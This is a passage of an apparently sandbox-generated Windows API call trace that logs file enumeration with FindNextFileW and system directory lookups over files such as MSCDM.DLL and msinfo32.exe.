SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.516] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x980e725f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x980e725f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.516] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.516] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6eb476, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a6eb476, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a6eb476, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.516] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.517] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.517] CoTaskMemFree (pv=0x4fe370) [0046.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.518] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe29f63af, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe2c31822, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe2c31822, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.519] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.519] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.519] CoTaskMemFree (pv=0x4fe370) [0046.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.554] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.554] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.554] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.555] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x98074e3f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x98074e3f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.555] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.555] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d513f43, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d513f43, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d53a0a3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.555] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.555] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.555] CoTaskMemFree (pv=0x4fe370) [0046.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1a4) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0046.556] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe268a454, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe287960d, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe287960d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0046.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0046.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0046.557] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.557] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.557] CoTaskMemFree (pv=0x4fe370) [0046.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0046.575] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0046.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0046.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69dc9750, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 1 [0046.576] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad59fd00, ftCreationTime.dwHighDateTime=0x1ca9454, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xad59fd00, ftLastWriteTime.dwHighDateTime=0x1ca9454, nFileSizeHigh=0x0, nFileSizeLow=0x665a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSCDM.DLL", cAlternateFileName="")) returned 0 [0046.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0046.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0046.576] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.576] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.576] CoTaskMemFree (pv=0x4fe370) [0046.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0046.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0046.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0046.577] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.578] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.578] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0046.578] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 1 [0046.578] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x830a4e7c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x830a4e7c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x830cafdd, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5c800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe", cAlternateFileName="")) returned 0 [0046.578] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.578] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.578] CoTaskMemFree (pv=0x4fe370) [0046.578] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0046.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0046.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 1 [0046.579] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0a09f, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xccb91a1, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xca0a09f, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x6800, dwReserved0=0x0, dwReserved1=0x0, cFileName="msinfo32.exe.mui", cAlternateFileName="")) returned 0 [0046.579] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.579] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.579] 